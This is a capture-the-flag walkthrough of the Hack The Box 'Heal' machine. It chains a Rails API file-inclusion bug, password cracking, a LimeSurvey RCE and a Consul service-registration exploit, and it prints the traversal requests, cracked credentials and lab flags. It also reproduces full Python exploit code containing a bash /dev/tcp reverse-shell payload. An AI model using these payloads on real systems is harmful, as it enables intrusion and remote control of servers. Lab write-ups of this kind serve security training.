HTB Heal Writeup (Walkthrough)
Machine Overview
- Name: Heal
- Difficulty: Medium
- OS: Linux
- IP: 10.10.11.46
Initial Enumeration
Port Scanning
Starting with a standard Nmap scan to identify open ports and running services:
1
sudo nmap -sC -sV -oA Heal/Heal 10.10.11.46
Results:
- Port 22: SSH (OpenSSH 8.9p1 Ubuntu)
- Port 80: HTTP (Nginx 1.18.0)
- HTTP title redirects to http://heal.htb/
Added the domain to my hosts file:
1
echo "10.10.11.46 heal.htb" | sudo tee -a /etc/hosts
Web Enumeration
After exploring the web application at http://heal.htb/, I discovered a JavaScript file that indicated an API:
1
http://heal.htb/static/js/0.chunk.js
Added the API subdomain to my hosts file:
1
echo "10.10.11.46 api.heal.htb" | sudo tee -a /etc/hosts
Accessing the API at http://api.heal.htb/ revealed:
- Rails version: 7.1.4
- Ruby version: 3.3.5
Directory enumeration using Gobuster on the API:
1
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://api.heal.htb/
Results:
- /download (Status: 401)
- /profile (Status: 401)
- /resume (Status: 401)
Exploitation Path 1: API File Inclusion
Account Creation and Authentication
- Created an account on the main website
- Logged in to access the resume creation feature
- Used Burp Suite to intercept the “export as PDF” functionality
Discovered a potential Local File Inclusion (LFI) vulnerability in the API endpoint:
1
2
3
4
5
6
OPTIONS /download?filename=etc/passwd HTTP/1.1
Host: api.heal.htb
Accept: */*
Access-Control-Request-Method: GET
Access-Control-Request-Headers: authorization
Origin: http://heal.htb
Exploiting the LFI
Successfully accessed /etc/passwd through this vulnerability:
1
2
3
GET /download?filename=etc/passwd HTTP/1.1
Host: api.heal.htb
Authorization: Bearer [JWT-TOKEN]
From the /etc/passwd contents, I identified two user accounts:
- ralph
- ron
Further File Enumeration
Since the API was running on Ruby on Rails, I targeted configuration files. Found the database configuration file:
1
GET /download?filename=../../config/database.yml HTTP/1.1
This revealed SQLite was being used:
1
2
3
production:
<<: *default
database: storage/development.sqlite3
Downloaded the SQLite database file:
1
GET /download?filename=../../../storage/development.sqlite3 HTTP/1.1
Credential Extraction
Found bcrypt hashed passwords in the database, particularly for [email protected]:
1
[email protected]:$2a$12$dUZ/O7KJT3.zE4TOK8p4RuxH3t.Bz45DSr7A94VLvY9SWx1GCSZnG
Cracked the hash using John the Ripper:
1
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=bcrypt
Credentials obtained:
1
[email protected]:147258369
Exploitation Path 2: LimeSurvey
Survey Application Discovery
Accessed the “Take the Survey” feature on the main site, which led to:
1
http://take-survey.heal.htb
Added this subdomain to my hosts file:
1
echo "10.10.11.46 take-survey.heal.htb" | sudo tee -a /etc/hosts
Directory enumeration uncovered an admin interface:
1
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://take-survey.heal.htb/
Results:
- /docs (Status: 301)
- /themes (Status: 301)
- /modules (Status: 301)
- /admin (Status: 301)
- /assets (Status: 301)
- /upload (Status: 301)
- /plugins (Status: 301)
LimeSurvey Admin Access
Successfully logged in to the admin interface using previously obtained credentials:
1
2
http://take-survey.heal.htb/admin
ralph:147258369
Identified the application as LimeSurvey Community Edition Version 6.6.4, with a known vulnerability CVE-2021-44967.
RCE Exploitation
Used a public exploit for LimeSurvey:
1
python3 ./exploit.py http://take-survey.heal.htb ralph 147258369 80
Gained initial shell access as www-data:
1
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Privilege Escalation
Internal Service Enumeration
After gaining shell access, identified various services running on the server:
1
ss -tuln
Found multiple services running on localhost, including:
- PostgreSQL (port 5432)
- HashiCorp Consul (ports 8300-8302, 8500, 8600)
- Other internal services (ports 3000, 3001)
Database Credentials
Located the LimeSurvey configuration file:
1
cat /var/www/limesurvey/application/config/config.php
Retrieved PostgreSQL credentials:
1
2
username: db_user
password: AdmiDi0_pA$$w0rd
Consul Exploitation
Found Consul service running on port 8500, which is susceptible to remote code execution:
- Created an exploit payload to leverage Consul’s service registration:
```python
Exploit Title: Hashicorp Consul v1.0 - Remote Command Execution (RCE)
Date: 26/10/2022
Exploit Author: GatoGamer1155, 0bfxgh0st
Vendor Homepage: https://www.consul.io/
Description: Exploit for gain reverse shell on Remote Command Execution via API
References: https://www.consul.io/api/agent/service.html
Tested on: Ubuntu Server
Software Link: https://github.com/hashicorp/consul
import requests, sys
if len(sys.argv) < 6:
print(f”\n[\033[1;31m-\033[1;37m] Usage: python3 {sys.argv[0]}
target = f”http://{sys.argv[1]}:{sys.argv[2]}/v1/agent/service/register” headers = {“X-Consul-Token”: f”{sys.argv[5]}”} json = {“Address”: “127.0.0.1”, “check”: {“Args”: [“/bin/bash”, “-c”, f”bash -i >& /dev/tcp/{sys.argv[3]}/{sys.argv[4]} 0>&1”], “interval”: “10s”, “Timeout”: “864000s”}, “ID”: “gato”, “Name”: “gato”, “Port”: 80}
try: requests.put(target, headers=headers, json=json) print(“\n[\033[1;32m+\033[1;37m] Request sent successfully, check your listener\n”) except: print(“\n[\033[1;31m-\033[1;37m] Something went wrong, check the connection and try again\n”)
1
2
2. Received a reverse shell with root privileges:
uid=0(root) gid=0(root) groups=0(root) ```
Flag Capture
- User flag:
0ba481b1801d7a5cae6ba5a1f2c639a5 - Root flag:
46d2a6d3946282a5177b4b5cdb6bee52
Key Takeaways
- Multiple vulnerability chains were present:
- LFI in Rails API leading to credential disclosure
- Authentication bypass via credential reuse
- RCE in LimeSurvey via CVE-2021-44967
- Privilege escalation through Consul service
- Insecure practices observed:
- Database credentials stored in cleartext
- Password reuse across different systems
- Unpatched software with known vulnerabilities
- Insecure Consul configuration allowing unauthenticated service registration
Done!
Hi there 👋 Support me!
Life is an echo—what you send out comes back.
